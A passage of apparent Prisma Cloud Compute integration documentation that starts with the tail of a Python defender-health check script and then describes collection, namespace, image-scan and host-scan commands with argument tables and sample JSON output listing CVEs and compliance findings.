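    return datetime.fromisoformat(stamp.replace("Z", "+00:00"))


def defender_findings(defender: dict, console_version: str, now: str,
                      cert_warn_days: int = 30) -> List[str]:
    """Return the problems found for one defender (empty list if healthy).

    `now` is passed in as an ISO-8601 string so the check is reproducible;
    a playbook would pass the current time.
    """
    findings: List[str] = []
    if not defender.get("connected", False):
        findings.append("disconnected")
    if not defender.get("compatibleVersion", True):
        findings.append("incompatible with console")
    version = defender.get("version")
    if version and version != console_version:
        findings.append(f"version {version} differs from console {console_version}")
    expiry = defender.get("certificateExpiration")
    if expiry:
        days_left = (parse_utc(expiry) - parse_utc(now)).days
        if days_left < 0:
            findings.append(f"certificate expired {-days_left} days ago")
        elif days_left <= cert_warn_days:
            findings.append(f"certificate expires in {days_left} days")
    return findings


def check_defenders(defenders: List[dict], console_version: str, now: str,
                    cert_warn_days: int = 30) -> Dict[str, List[str]]:
    """Map hostname -> findings for every defender that has at least one."""
    report: Dict[str, List[str]] = {}
    for d in defenders:
        findings = defender_findings(d, console_version, now, cert_warn_days)
        if findings:
            report[d.get("hostname", "?")] = findings
    return report


if __name__ == "__main__":
    for host, findings in check_defenders(SAMPLE_DEFENDERS, "21.04.439",
                                          "2024-08-15T11:00:00Z").items():
        print(host, "->", "; ".join(findings))
```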

prisma-cloud-compute-collections-list#


Retrieves a list of all collections.

Base Command#

prisma-cloud-compute-collections-list

Requires Role#

auditor

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| limit | The maximum number of records of collections to return. Default is 50. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.Collection.accountIDs | String | A list of the cloud account IDs. |
| PrismaCloudCompute.Collection.appIDs | String | A list of application IDs. |
| PrismaCloudCompute.Collection.clusters | String | A list of Kubernetes cluster names. |
| PrismaCloudCompute.Collection.codeRepos | String | A list of remote code repositories. |
| PrismaCloudCompute.Collection.color | String | A color code associated with the collection. |
| PrismaCloudCompute.Collection.containers | String | A list of containers that are associated with this collection. |
| PrismaCloudCompute.Collection.description | String | A free-text description of the collection. |
| PrismaCloudCompute.Collection.functions | String | A list of functions that are associated with this collection. |
| PrismaCloudCompute.Collection.hosts | String | A list of hosts that are associated with this collection. |
| PrismaCloudCompute.Collection.images | String | A list of images that are associated with this collection. |
| PrismaCloudCompute.Collection.labels | String | A list of labels that are associated with this collection. |
| PrismaCloudCompute.Collection.modified | Date | The timestamp of when the collection was last modified. |
| PrismaCloudCompute.Collection.name | String | A unique name associated with the collection. |
| PrismaCloudCompute.Collection.namespaces | String | The Kubernetes namespaces. |
| PrismaCloudCompute.Collection.owner | String | The collection owner (the last user who modified the collection). |
| PrismaCloudCompute.Collection.system | Boolean | Whether this collection was created by the system or by the user. |

Command Example#

!prisma-cloud-compute-collections-list limit=1

Context Example#

{
"PrismaCloudCompute": {
"Collection": {
"functions": [
"*"
],
"appIDs": [
"*"
],
"description": "System - all resources collection",
"color": "#602DFB",
"prisma": false,
"labels": [
"*"
],
"modified": "September 02, 2021 11:05:06 AM",
"system": true,
"owner": "system",
"hosts": [
"*"
],
"namespaces": [
"*"
],
"codeRepos": [
"*"
],
"images": [
"*"
],
"clusters": [
"*"
],
"accountIDs": [
"*"
],
"containers": [
"*"
],
"name": "All"
}
}
}

Human Readable Output#

Collections Information#

| Name | Description | Owner | Modified |
| --- | --- | --- | --- |
| All | System - all resources collection | system | September 02, 2021 11:05:06 AM |

prisma-cloud-compute-container-namespace-list#


Get the container namespace names.

Base Command#

prisma-cloud-compute-container-namespace-list

Requires Role#

devSecOps

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| cluster | Comma-separated list of cluster names to filter the results by. | Optional |
| collections | Comma-separated list of collections to filter the results by. Can be retrieved from !prisma-cloud-compute-collections-list. | Optional |
| limit | The maximum number of namespace name records to return. Default is 50. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.RadarContainerNamespace | String | The names of the container namespaces. |

Command Example#

!prisma-cloud-compute-container-namespace-list limit=3

Context Example#

{
"PrismaCloudCompute": {
"RadarContainerNamespace": [
"namespace1",
"namespace2",
"namespace3"
]
}
}

Human Readable Output#

Collections Information#

| Name |
| --- |
| namespace1 |
| namespace2 |
| namespace3 |

prisma-cloud-compute-images-scan-list#


Get the image scan report. The report includes vulnerabilities, compliance issues, binaries, etc.

Base Command#

prisma-cloud-compute-images-scan-list

Requires Role#

vulnerabilityManager

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| clusters | Comma-separated list of cluster names to filter the results by. | Optional |
| compact | Whether only minimal image data is to be returned (i.e., skip vulnerabilities, compliance, and extended image metadata). Possible values are: true, false. Default is true. | Optional |
| fields | Comma-separated list of fields to retrieve. Possible values are labels, repo, registry, clusters, hosts, tag. | Optional |
| hostname | Comma-separated list of hostnames to filter the results by. Can be retrieved from !prisma-cloud-compute-profile-host-list. | Optional |
| id | Comma-separated list of image IDs to filter the results by. Run !prisma-cloud-compute-images-scan-list without any arguments to get image IDs. | Optional |
| name | Comma-separated list of image names to filter the results by. | Optional |
| registry | Comma-separated list of image registries to filter the results by. | Optional |
| repository | Comma-separated list of image repositories to filter the results by. | Optional |
| limit_record | The maximum number of scan image records to return. Default is 10. | Optional |
| limit_stats | The maximum number of compliance/vulnerability records to return. Default is 10. | Optional |
| offset | The offset by which to begin listing images scan results. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.ReportsImagesScan._id | String | Image identifier (image ID or repo:tag). |
| PrismaCloudCompute.ReportsImagesScan.allCompliance | Unknown | Data regarding passed compliance checks. |
| PrismaCloudCompute.ReportsImagesScan.appEmbedded | Boolean | Whether this image was scanned by an app-embedded defender. |
| PrismaCloudCompute.ReportsImagesScan.applications | Unknown | Products in the image. |
| PrismaCloudCompute.ReportsImagesScan.baseImage | String | Image's base image name. Used when filtering the vulnerabilities by base images. |
| PrismaCloudCompute.ReportsImagesScan.binaries | Unknown | Binaries in the image. |
| PrismaCloudCompute.ReportsImagesScan.cloudMetadata | Unknown | The metadata for an instance running in a cloud provider (AWS/GCP/Azure). |
| PrismaCloudCompute.ReportsImagesScan.clusters | String | Cluster names. |
| PrismaCloudCompute.ReportsImagesScan.collections | String | Collections to which this result applies. |
| PrismaCloudCompute.ReportsImagesScan.complianceDistribution | Unknown | The number of vulnerabilities per type. |
| PrismaCloudCompute.ReportsImagesScan.complianceIssues | Unknown | Number of compliance issues. |
| PrismaCloudCompute.ReportsImagesScan.complianceRiskScore | Number | Compliance risk score for the image. |
| PrismaCloudCompute.ReportsImagesScan.creationTime | Date | Date/time when the image was created. |
| PrismaCloudCompute.ReportsImagesScan.distro | String | Full name of the distribution. |
| PrismaCloudCompute.ReportsImagesScan.ecsClusterName | String | Elastic Container Service (ECS) cluster name. |
| PrismaCloudCompute.ReportsImagesScan.err | String | Description of an error that occurred during image health scan. |
| PrismaCloudCompute.ReportsImagesScan.externalLabels | Unknown | Kubernetes external labels of all containers running this image. |
| PrismaCloudCompute.ReportsImagesScan.files | Unknown | Files in the container. |
| PrismaCloudCompute.ReportsImagesScan.firewallProtection | Unknown | The status of the Web-Application and API Security (WAAS) protection. |
| PrismaCloudCompute.ReportsImagesScan.firstScanTime | Date | Date/time when this image was first scanned (preserved during version updates). |
| PrismaCloudCompute.ReportsImagesScan.history | Unknown | Docker image history. |
| PrismaCloudCompute.ReportsImagesScan.hostDevices | String | Map from host network device name to IP address. |
| PrismaCloudCompute.ReportsImagesScan.hostname | String | Name of the host that was scanned. |
| PrismaCloudCompute.ReportsImagesScan.hosts | Unknown | A fast index for image scan results metadata per host. |
| PrismaCloudCompute.ReportsImagesScan.id | String | Image ID. |
| PrismaCloudCompute.ReportsImagesScan.image | Unknown | A container image. |
| PrismaCloudCompute.ReportsImagesScan.installedProducts | Unknown | Data regarding products running in the environment. |
| PrismaCloudCompute.ReportsImagesScan.instances | Unknown | Details about each occurrence of the image (tag + host). |
| PrismaCloudCompute.ReportsImagesScan.k8sClusterAddr | String | Endpoint of the Kubernetes API server. |
| PrismaCloudCompute.ReportsImagesScan.labels | String | Image labels. |
| PrismaCloudCompute.ReportsImagesScan.layers | String | Image's filesystem layers. Each layer is a SHA256 digest of the filesystem diff. |
| PrismaCloudCompute.ReportsImagesScan.missingDistroVulnCoverage | Boolean | Whether the image OS is covered in the IS (true) or not (false). |
| PrismaCloudCompute.ReportsImagesScan.namespaces | String | Kubernetes namespaces of all the containers running this image. |
| PrismaCloudCompute.ReportsImagesScan.osDistro | String | Name of the OS distribution. |
| PrismaCloudCompute.ReportsImagesScan.osDistroRelease | String | OS distribution release. |
| PrismaCloudCompute.ReportsImagesScan.osDistroVersion | String | OS distribution version. |
| PrismaCloudCompute.ReportsImagesScan.packageManager | Boolean | Whether the package manager is installed for the OS. |
| PrismaCloudCompute.ReportsImagesScan.packages | Unknown | Packages that exist in the image. |
| PrismaCloudCompute.ReportsImagesScan.registryNamespace | String | IBM cloud namespace to which the image belongs. |
| PrismaCloudCompute.ReportsImagesScan.repoDigests | String | Digests of the image. Used for content trust (notary). Has one digest per tag. |
| PrismaCloudCompute.ReportsImagesScan.repoTag | Unknown | An image repository and its associated tag or registry digest. |
| PrismaCloudCompute.ReportsImagesScan.rhelRepos | String | The (RPM) repositories IDs from which the packages in this image were installed. Used for matching vulnerabilities by Red Hat CPEs. |
| PrismaCloudCompute.ReportsImagesScan.riskFactors | Unknown | The mapping of the existence of vulnerability risk factors. |
| PrismaCloudCompute.ReportsImagesScan.scanID | String | Scan ID. |
| PrismaCloudCompute.ReportsImagesScan.scanTime | Date | Date/time of the last scan of the image. |
| PrismaCloudCompute.ReportsImagesScan.scanVersion | String | Defender version that published the image. |
| PrismaCloudCompute.ReportsImagesScan.startupBinaries | Unknown | Binaries that are expected to run when the container is created from this image. |
| PrismaCloudCompute.ReportsImagesScan.tags | Unknown | Tags associated with the given image. |
| PrismaCloudCompute.ReportsImagesScan.topLayer | String | SHA256 of the image's last layer that is the last element of the Layers field. |
| PrismaCloudCompute.ReportsImagesScan.trustResult | Unknown | An aggregated image trust result. |
| PrismaCloudCompute.ReportsImagesScan.trustStatus | String | The trust status for an image. |
| PrismaCloudCompute.ReportsImagesScan.twistlockImage | Boolean | Whether the image is a Twistlock image (true) or not (false). |
| PrismaCloudCompute.ReportsImagesScan.type | Unknown | The scanning type performed. |
| PrismaCloudCompute.ReportsImagesScan.vulnerabilities | Unknown | CVE vulnerabilities of the image. |
| PrismaCloudCompute.ReportsImagesScan.vulnerabilitiesCount | Number | Total number of vulnerabilities. |
| PrismaCloudCompute.ReportsImagesScan.vulnerabilityDistribution | Unknown | The number of vulnerabilities per type. |
| PrismaCloudCompute.ReportsImagesScan.vulnerabilityRiskScore | Number | Image's CVE risk score. |
| PrismaCloudCompute.ReportsImagesScan.wildFireUsage | Unknown | The Wildfire usage stats. The period for the usage varies with the context. |
| PrismaCloudCompute.ReportsImagesScan.complianceIssuesCount | Number | Number of compliance issues. |

Command Example#

!prisma-cloud-compute-images-scan-list id=image123 limit_stats=2 compact=false

Context Example#

{
"PrismaCloudCompute": {
"ReportsImagesScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "",
"vulnerabilityDistribution": {
"high": 28,
"total": 60,
"medium": 20,
"critical": 12,
"low": 0
},
"image": {
"created": "2018-05-10T10:32:49.309Z"
},
"instances": [
{
"image": "demisto/python:1.3-alpine",
"modified": "2021-12-14T14:19:36.091Z",
"repo": "demisto/python",
"host": "host123",
"tag": "1.3-alpine",
"registry": ""
}
],
"complianceIssues": [
{
"templates": [
"PCI",
"DISA STIG"
],
"vecStr": "",
"text": "",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"layerTime": 0,
"id": 41,
"severity": "high",
"title": "(CIS_Docker_v1.2.0 - 4.1) Image should be created with a non-root user",
"packageVersion": "",
"cause": "",
"cvss": 0,
"status": "",
"twistlock": false,
"fixDate": "",
"description": "It is a good practice to run the container as a non-root user, if possible. Though user\nnamespace mapping is now available, if a user is already defined in the container image, the\ncontainer is run as that user by default and specific user namespace remapping is not\nrequired",
"link": "",
"cri": false,
"riskFactors": null,
"type": "image",
"packageName": "",
"functionLayer": "",
"published": 0,
"cve": ""
}
],
"repoTag": {
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
},
"packageManager": true,
"repoDigests": [
"demisto/python@sha256:0bfa24a116efb99c51076ee3801ee8de80e5998a0f85522599c7036dea8a67f1"
],
"id": "image123",
"layers": [
"sha256:04a094fe844e055828cb2d64ead6bd3eb4257e7c7b5d1e2af0da89fa20472cf4",
"sha256:b901e62fe587b147e801712b7833942a540492af8f67cc683ac5a3b7bcbf7eda",
"sha256:240070abd5cc482cbe83e70710e9c161105bf1b69fc4551ceedac541aec1e552",
"sha256:08ed7077578e63f32e98ec38644705d67aec68661663cfa43e7e771f37ac781b",
"sha256:25f89c88aa30915565de42481044fdc3edcde2edcd88c32098b16adbe09c65ec",
"sha256:607e311316ef7ea1437fe4b8f7a6f04f9a61b0f21e2d4ee0611c05bd1d245ff7",
"sha256:21511d4e2cf5964090236c3db6aa38c23f8937aab18226dd1898ef4346fa9a3c",
"sha256:9ec31cab0619e95e88291cd611370e4d0f61d540862496b89eed00845d48a3a8",
"sha256:ce388cb57837216290c2ec5c33ee70ff50ee70a479fdc401f9170f278e68c15d",
"sha256:887b26e25244256638869a154e4b7427f124a1ef64723ea7082096025e7f1520",
"sha256:40c6aaccab9bea3953dfa459e3426d0f8a23fda23ec5495404ae21afa94af475",
"sha256:082ca23ed20f62157e6b3958ed4899fccd6de2501468f668874d746f0af1bc69",
"sha256:e252153001780e97deed131418ef8ed0ad8176f55e14916a338120cc8a464af8",
"sha256:11f9d19047c7dfc84742694c7c7db04ceb346bf60e44a8a28947937aa3408ba2",
"sha256:1945710968a74b7692f635829f9dac189df097b8f7d135aa51f6726dccb2a2be",
"sha256:9dfc2f79a6a83bd3791f4b6c621850b49db37ff729cdc17fd0a7b0ec373338c6"
],
"packages": [
{
"pkgsType": "package",
"pkgs": [
{
"name": "busybox",
"version": "1.27.2-r8",
"cveCount": 450,
"license": "GPL2",
"layerTime": 1525948365
},
{
"name": "apk-tools",
"version": "2.9.1-r2",
"cveCount": 25,
"license": "GPL2",
"layerTime": 1512154128
}
]
},
{
"pkgsType": "python",
"pkgs": [
{
"name": "python",
"version": "2.7.14",
"cveCount": 65,
"license": "PSF license",
"layerTime": 1513722622
},
{
"name": "certifi",
"version": "2017.11.5",
"cveCount": 0,
"license": "MPL-2.0",
"layerTime": 1515337812
}
]
}
],
"complianceDistribution": {
"high": 1,
"total": 1,
"medium": 0,
"critical": 0,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"allCompliance": {},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "Alpine Linux v3.7",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": [
{
"path": "/usr/local/bin/python2.7",
"cveCount": 0,
"name": "python",
"md5": "dc8c57a9674d54da18637ffea29eeaba"
}
],
"scanVersion": "21.04.439",
"type": "image",
"distro": "Alpine Linux v3.7",
"files": [],
"scanID": 0,
"osDistro": "alpine",
"tags": [
{
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
}
],
"Secrets": [],
"applications": [
{
"knownVulnerabilities": 26,
"path": "/bin/busybox",
"version": "1.27.2",
"layerTime": 1525948355,
"name": "busybox"
}
],
"osDistroRelease": "3.7.0",
"topLayer": "sha256:9dfc2f79a6a83bd3791f4b6c621850b49db37ff729cdc17fd0a7b0ec373338c6",
"osDistroVersion": "3.7.0",
"trustStatus": "trusted",
"firstScanTime": "2021-09-02T11:05:27.439Z",
"_id": "image123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Critical severity": {},
"Medium severity": {},
"DoS": {}
},
"err": "",
"vulnerabilitiesCount": 60,
"scanTime": "2021-12-14T14:19:36.091Z",
"complianceIssuesCount": 1,
"creationTime": "2018-05-10T10:32:49.309Z",
"vulnerabilities": [
{
"templates": null,
"vecStr": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"text": "",
"discovered": "2021-09-02T11:05:27Z",
"exploit": "",
"layerTime": 1525948365,
"id": 46,
"applicableRules": [
"<1.30.0"
],
"severity": "high",
"title": "",
"packageVersion": "1.27.2-r8",
"cause": "",
"cvss": 7.5,
"status": "fixed in 1.30.1-r5",
"twistlock": false,
"fixDate": "January 09, 2019 16:29:00 PM",
"description": "An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in networking/udhcp/common.c that 4-byte options are indeed 4 bytes.",
"link": "https://nvd.nist.gov/vuln/detail/CVE-2018-20679",
"cri": false,
"riskFactors": {
"Attack complexity: low": {},
"High severity": {},
"Attack vector: network": {},
"Has fix": {}
},
"type": "image",
"packageName": "busybox",
"functionLayer": "",
"published": 1547051340,
"cve": "CVE-2018-20679"
},
{
"templates": null,
"vecStr": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"text": "",
"discovered": "2021-09-02T11:05:27Z",
"exploit": "",
"layerTime": 1525948365,
"id": 46,
"applicableRules": [
"<1.29.0"
],
"severity": "critical",
"title": "",
"packageVersion": "1.27.2-r8",
"cause": "",
"cvss": 9.8,
"status": "fixed in 1.29.3-r10",
"twistlock": false,
"fixDate": "June 26, 2018 16:29:00 PM",
"description": "BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e.",
"link": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000517",
"cri": false,
"riskFactors": {
"Attack complexity: low": {},
"Attack vector: network": {},
"Has fix": {},
"Critical severity": {}
},
"type": "image",
"packageName": "busybox",
"functionLayer": "",
"published": 1530030540,
"cve": "CVE-2018-1000517"
}
],
"hosts": {
"host123": {
"modified": "2021-12-14T14:19:36.091Z"
}
},
"complianceRiskScore": 10000,
"wildFireUsage": null,
"binaries": [
{
"path": "/bin/busybox",
"version": "1.27.2",
"cveCount": 0,
"name": "busybox",
"md5": "17890907c72a9aa14c5580faf4f6a30a"
},
{
"path": "/sbin/apk",
"cveCount": 0,
"name": "apk",
"md5": "8f77c14fa2ab4f668f6af4bfa3e12587"
}
],
"vulnerabilityRiskScore": 12282000,
"history": [
{
"sizeBytes": 4143684,
"instruction": "ADD file:2b00f26f6004576e2f8faeb3fb0517a14f79ea89a059fe096b54cbecf5da512e in / ",
"emptyLayer": false,
"id": "<missing>",
"created": 1512154128
},
{
"instruction": "CMD [\"/bin/sh\"]",
"emptyLayer": true,
"id": "<missing>",
"created": 1512154128
}
]
}
}
}

Human Readable Output#

Image description#

| ID | Image | OS Distribution | Vulnerabilities Count | Compliance Issues Count |
| --- | --- | --- | --- | --- |
| image123 | demisto/python:1.3-alpine | Alpine Linux v3.7 | 60 | 1 |

Vulnerabilities#

| Cve | Description | Severity | Package Name | Status | Fix Date |
| --- | --- | --- | --- | --- | --- |
| CVE-2018-20679 | An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in networking/udhcp/common.c that 4-byte options are indeed 4 bytes. | high | busybox | fixed in 1.30.1-r5 | January 09, 2019 16:29:00 PM |
| CVE-2018-1000517 | BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e. | critical | busybox | fixed in 1.29.3-r10 | June 26, 2018 16:29:00 PM |

Compliances#

| Id | Severity | Description |
| --- | --- | --- |
| 41 | high | It is a good practice to run the container as a non-root user, if possible. Though user namespace mapping is now available, if a user is already defined in the container image, the container is run as that user by default and specific user namespace remapping is not required |

Command Example#

!prisma-cloud-compute-images-scan-list id=image123 limit_stats=2 compact=true

Context Example#

{
"PrismaCloudCompute": {
"ReportsImagesScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "",
"vulnerabilityDistribution": {
"high": 28,
"total": 60,
"medium": 20,
"critical": 12,
"low": 0
},
"image": {
"created": "2018-05-10T10:32:49.309Z"
},
"instances": [
{
"image": "demisto/python:1.3-alpine",
"modified": "2021-12-14T14:19:36.091Z",
"repo": "demisto/python",
"host": "host123",
"tag": "1.3-alpine",
"registry": ""
}
],
"complianceIssues": null,
"repoTag": {
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
},
"packageManager": false,
"repoDigests": [
"123"
],
"id": "image123",
"packages": null,
"complianceDistribution": {
"high": 1,
"total": 1,
"medium": 0,
"critical": 0,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"allCompliance": {},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "Alpine Linux v3.7",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": null,
"scanVersion": "21.04.439",
"type": "image",
"distro": "Alpine Linux v3.7",
"files": null,
"scanID": 0,
"osDistro": "alpine",
"tags": [
{
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
}
],
"Secrets": null,
"osDistroRelease": "3.7.0",
"topLayer": "sha256:9dfc2f79a6a83bd3791f4b6c621850b49db37ff729cdc17fd0a7b0ec373338c6",
"osDistroVersion": "",
"trustStatus": "trusted",
"firstScanTime": "2021-09-02T11:05:27.439Z",
"_id": "image123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Critical severity": {},
"Medium severity": {},
"DoS": {}
},
"err": "",
"vulnerabilitiesCount": 60,
"scanTime": "2021-12-14T14:19:36.091Z",
"complianceIssuesCount": 1,
"creationTime": "2018-05-10T10:32:49.309Z",
"vulnerabilities": null,
"hosts": {
"host123": {
"modified": "2021-12-14T14:19:36.091Z"
}
},
"complianceRiskScore": 10000,
"wildFireUsage": null,
"binaries": null,
"vulnerabilityRiskScore": 12282000,
"history": null
}
}
}

Human Readable Output#

Image description#

| ID | Image | OS Distribution | Vulnerabilities Count | Compliance Issues Count |
| --- | --- | --- | --- | --- |
| image123 | demisto/python:1.3-alpine | Alpine Linux v3.7 | 60 | 1 |

Vulnerability Statistics#

| Critical | High | Medium | Low |
| --- | --- | --- | --- |
| 12 | 28 | 20 | 0 |

Compliance Statistics#

| Critical | High | Medium | Low |
| --- | --- | --- | --- |
| 0 | 1 | 0 | 0 |

prisma-cloud-compute-hosts-scan-list#


Get hosts scan report. The report includes vulnerabilities, compliance issues, binaries, etc.

Base Command#

prisma-cloud-compute-hosts-scan-list

Requires Role#

vulnerabilityManager

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| clusters | A comma-separated list of cluster names to filter the results by. | Optional |
| compact | Whether only minimal image data is to be returned (i.e., skip vulnerabilities, compliance, and extended image metadata). Possible values are: true, false. Default is true. | Optional |
| distro | Comma-separated list of operating system distros to filter the results by. | Optional |
| fields | Comma-separated list of fields to return. Possible values are labels, repo, registry, clusters, hosts, tag. | Optional |
| hostname | Comma-separated list of hostnames to filter the results by. Can be retrieved from !prisma-cloud-compute-profile-host-list. | Optional |
| provider | Comma-separated list of cloud providers to filter the results by. | Optional |
| limit_record | The maximum number of scan host records to return. Default is 10. | Optional |
| limit_stats | The maximum number of compliance/vulnerability records to return. Default is 10. | Optional |
| offset | The offset by which to begin listing host scan results. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.ReportHostScan._id | String | The host identifier (host ID or hostname). |
| PrismaCloudCompute.ReportHostScan.allCompliance | Unknown | Data regarding passed compliance checks. |
| PrismaCloudCompute.ReportHostScan.appEmbedded | Boolean | Whether this image was scanned by an app-embedded defender. |
| PrismaCloudCompute.ReportHostScan.applications | Unknown | Products in the image. |
| PrismaCloudCompute.ReportHostScan.binaries | Unknown | Binaries in the image. |
| PrismaCloudCompute.ReportHostScan.cloudMetadata | Unknown | The metadata for an instance running in a cloud provider (AWS/GCP/Azure). |
| PrismaCloudCompute.ReportHostScan.clusters | String | Cluster names. |
| PrismaCloudCompute.ReportHostScan.collections | String | Collections to which this result applies. |
| PrismaCloudCompute.ReportHostScan.complianceDistribution | Unknown | The number of vulnerabilities per type. |
| PrismaCloudCompute.ReportHostScan.complianceIssues | Unknown | Number of compliance issues. |
| PrismaCloudCompute.ReportHostScan.complianceRiskScore | Number | Compliance risk score for the image. |
| PrismaCloudCompute.ReportHostScan.creationTime | Date | Date/time when the image was created. |
| PrismaCloudCompute.ReportHostScan.distro | String | Full name of the distribution. |
| PrismaCloudCompute.ReportHostScan.ecsClusterName | String | Elastic Container Service (ECS) cluster name. |
| PrismaCloudCompute.ReportHostScan.err | String | Description of an error that occurred during image health scan. |
| PrismaCloudCompute.ReportHostScan.externalLabels | Unknown | Kubernetes external labels of all containers running this image. |
| PrismaCloudCompute.ReportHostScan.firewallProtection | Unknown | The status of the Web-Application and API Security (WAAS) protection. |
| PrismaCloudCompute.ReportHostScan.firstScanTime | Date | Date/time when this image was first scanned (preserved during version updates). |
| PrismaCloudCompute.ReportHostScan.history | Unknown | Docker image history. |
| PrismaCloudCompute.ReportHostScan.hostDevices | String | Map from host network device name to IP address. |
| PrismaCloudCompute.ReportHostScan.hostname | String | Name of the host that was scanned. |
| PrismaCloudCompute.ReportHostScan.hosts | Unknown | A fast index for image scan results metadata per host. |
| PrismaCloudCompute.ReportHostScan.image | Unknown | A container image. |
| PrismaCloudCompute.ReportHostScan.installedProducts | Unknown | Data regarding products running in the environment. |
| PrismaCloudCompute.ReportHostScan.instances | Unknown | Details about each occurrence of the image (tag + host). |
| PrismaCloudCompute.ReportHostScan.k8sClusterAddr | String | Endpoint of the Kubernetes API server. |
| PrismaCloudCompute.ReportHostScan.namespaces | String | Kubernetes namespaces of all the containers running this image. |
| PrismaCloudCompute.ReportHostScan.osDistro | String | Name of the operating system distribution. |
| PrismaCloudCompute.ReportHostScan.osDistroRelease | String | Operating system distribution release. |
| PrismaCloudCompute.ReportHostScan.osDistroVersion | String | Operating system distribution version. |
| PrismaCloudCompute.ReportHostScan.packageManager | Boolean | Whether the package manager is installed for the operating system. |
| PrismaCloudCompute.ReportHostScan.packages | Unknown | The packages that exist in the image. |
| PrismaCloudCompute.ReportHostScan.repoDigests | String | Digests of the image. Used for content trust (notary). Has one digest per tag. |
| PrismaCloudCompute.ReportHostScan.repoTag | Unknown | An image repository and its associated tag or registry digest. |
| PrismaCloudCompute.ReportHostScan.riskFactors | Unknown | Maps the existence of vulnerability risk factors. |
| PrismaCloudCompute.ReportHostScan.scanID | String | Scan ID. |
| PrismaCloudCompute.ReportHostScan.scanTime | Date | Date/time of the last scan of the image. |
| PrismaCloudCompute.ReportHostScan.scanVersion | String | Defender version that published the image. |
| PrismaCloudCompute.ReportHostScan.startupBinaries | Unknown | Binaries that are expected to run when the container is created from this image. |
| PrismaCloudCompute.ReportHostScan.tags | Unknown | Tags associated with the given image. |
| PrismaCloudCompute.ReportHostScan.topLayer | String | SHA256 of the image's last layer that is the last element of the Layers field. |
| PrismaCloudCompute.ReportHostScan.trustStatus | String | The trust status for an image. |
| PrismaCloudCompute.ReportHostScan.type | Unknown | The scanning type performed. |
| PrismaCloudCompute.ReportHostScan.vulnerabilities | Unknown | CVE vulnerabilities of the host. |
| PrismaCloudCompute.ReportHostScan.vulnerabilitiesCount | Number | Total number of vulnerabilities. |
| PrismaCloudCompute.ReportHostScan.vulnerabilityDistribution | Unknown | The number of vulnerabilities per type. |
| PrismaCloudCompute.ReportHostScan.vulnerabilityRiskScore | Number | Image's CVE risk score. |
| PrismaCloudCompute.ReportHostScan.wildFireUsage | Unknown | The Wildfire usage stats. The period for the usage varies with the context. |
| PrismaCloudCompute.ReportHostScan.complianceIssuesCount | Unknown | Number of compliance issues. |

Command Example#

!prisma-cloud-compute-hosts-scan-list hostname=host123 compact=false limit_stats=2

Context Example#

{
"PrismaCloudCompute": {
"ReportHostScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "host123",
"vulnerabilityDistribution": {
"high": 4,
"total": 191,
"medium": 78,
"critical": 0,
"low": 109
},
"creationTime": "0001-01-01T00:00:00Z",
"image": {
"created": "0001-01-01T00:00:00Z"
},
"labels": [
"osDistro:ubuntu",
"osVersion:16.04"
],
"instances": [],
"complianceIssues": [
{
"templates": [
"GDPR"
],
"vecStr": "",
"text": "",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"layerTime": 0,
"id": 16,
"severity": "high",
"title": "(CIS_Docker_CE_v1.1.0 - 1.4) Only allow trusted users to control Docker daemon",
"packageVersion": "",
"cause": "1 users in docker group: demisto",
"cvss": 0,
"status": "",
"twistlock": false,
